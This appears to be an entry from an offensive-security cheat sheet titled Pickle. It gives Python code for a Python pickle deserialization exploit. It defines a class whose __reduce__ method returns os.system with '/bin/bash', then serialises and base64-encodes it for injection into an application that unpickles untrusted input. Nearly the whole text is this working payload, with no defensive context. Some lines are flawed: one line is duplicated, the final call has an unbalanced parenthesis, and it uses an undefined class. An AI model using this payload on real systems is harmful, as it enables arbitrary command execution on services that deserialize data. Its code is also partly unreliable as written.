killchain-compendium/Exploits/Python/Pickle.md

Pickle

Payload

• Inject payload

import pickle
import os
import base64
class evil_object(object):
    def __reduce__(self):
        return(os.system, ('/bin/bash',))
x = evil_object()
x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)

• Dump serialized object via

pickle.dump(SerializedPickle(), open('pickled.out', 'wb')